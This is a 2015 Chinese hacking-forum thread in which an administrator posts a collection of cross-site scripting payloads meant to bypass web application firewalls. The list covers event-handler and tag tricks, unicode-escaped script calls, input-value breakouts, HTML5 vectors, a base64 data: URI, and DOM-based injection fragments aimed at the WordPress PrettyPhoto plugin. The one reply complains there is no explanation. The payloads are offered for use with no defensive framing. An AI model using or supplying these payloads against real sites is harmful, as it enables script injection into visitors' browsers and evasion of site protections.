搜索
查看: 942|回复: 1

vectors xss

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-7-31 22:26:56 | 显示全部楼层 |阅读模式
  1. /*These vectors will help to circumvent some of the limitations in the bypass WAF*/
  2. /*All designs have been collected by me from different sources! special thanks to all the researchers xssposed archive*/
  3.                                        
  4. <svg><x><script>alert(1)</x>
  5. <svg><x><script>alert('1')</x>
  6. <svg onload=window.onerror=alert;throw/1/;//"/>
  7. <img src=x onerror=while(true){prompt(1)}>
  8. <iframe src=""/srcdoc='<svg onload=alert(1)>'>
  9. <!--<img src="--><img src=x onerror=alert(1)//">
  10. <svg id=javascript:alert(1) onload=location=id>
  11. <svg id=alert(1) onload=eval(id)>
  12. <img src=x:alert(alt) onerror=eval(src) alt=xwx>
  13. <body/onpageshow=(alert)(1)>
  14. <svg id=alert(1) onload=eval(id)>
  15. <svg onload=(alert)(1) >
  16. <frameset onload=alert(1)>
  17.                                                       
  18. /*To bypass input values*/

  19. "autofocus/onfocus="alert (/1)
  20. onfocus=onfocus=\u0061lert(1) autofocus
  21. autofocus onfocus=window.onerror=alert;throw/1/;//

  22.                                                       

  23. /*Bypass filtration "script/alert"*/
  24.                                           
  25. <script>$=1,alert($)</script>
  26. <script ~~~>confirm(1)</script ~~~>       
  27. <script>$=1,\u0061lert($)</script>
  28. <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
  29. <</script/script><script ~~~>\u0061lert(1)</script ~~~>
  30. </style></scRipt><scRipt>alert(1)</scRipt>
  31.                                                       
  32. /*tougher policy on the html tags*/
  33.                                          
  34. <h1 onmouseover=alert(1)>xwx
  35. <h1/onmouseover='\u0061lert(1)'>xwx
  36. <marquee/onstart=alert(1)>xwx
  37. <div/onmouseover='alert(1)'>xwx
  38. <h1/onmouseover='alert(1)'>xwx
  39. <h1 onmouseover='alert(1)'>xwx
  40. <p onmouseover='alert(1)'>xwx
  41. <p/onmouseover='alert(1)'>xwx
  42. <plaintext/onmouseover=prompt(1)>         
  43.                                                                
  44. /*Classic very popular vector*/
  45.                                          
  46. <script>alert(1)</script>
  47. </script><img src=x onerror=alert(1);>
  48. </script><iframe/onload=alert(1)>
  49. <img src=x onerror=alert(1);>
  50. <style ONLOAD=prompt(1)>
  51. <iframe/onload=alert(1)>
  52. <svg/onload=prompt(1)>
  53. <svg onload=alert(1)>

  54. "style=background:black; onmouseover=alert(1)"
  55. "autofocus/onfocus="alert(1)
  56. "onmouseover="alert(1);"
  57. "/onmouseover= alert(1)>
  58. "onload="alert(1)""
  59.                                                         
  60.                                                                                                                        
  61. /*HTML5 popular vectors*/
  62.                                          
  63. <video/poster/onerror=alert(1)>
  64. <video><source onerror="javascript:alert(1)">
  65. <video onerror="javascript:alert(1)"><source>
  66. <audio onerror="javascript:alert(1)"><source>
  67. <input autofocus onfocus=alert(1)>
  68. <select autofocus onfocus=alert(1)>
  69. <textarea autofocus onfocus=alert(1)>
  70. <keygen autofocus onfocus=alert(1)>
  71. <form><button formaction="javascript:alert(1)">                 
  72.                                          
  73.                                          
  74. /*data:text*/
  75. data:text/plain,alert('xwx')
  76. data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

  77. /*Bonus Dom Based Xss wector for popular WordPress plugin Prettyphoto*/
  78.                                          
  79. #!prettyPhoto/2,<a onclick="alert(1);">/                                /*firefox*/                         
  80. #prettyPhoto[gallery]/1,<a onclick="alert(1);">/                  /*firefox*/
  81. #prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/        /*firefox*/       
  82.        
  83. #prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)>               /*Only Google chrome*/


  84.                                                       
  85.   

  86.                                                         
复制代码
https://set-cookie.ru/inject/vec.txt
过段时间可能会取消签到功能了
小宽 该用户已被删除
发表于 2015-8-4 11:21:42 | 显示全部楼层
没有详细解释,差评~~
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表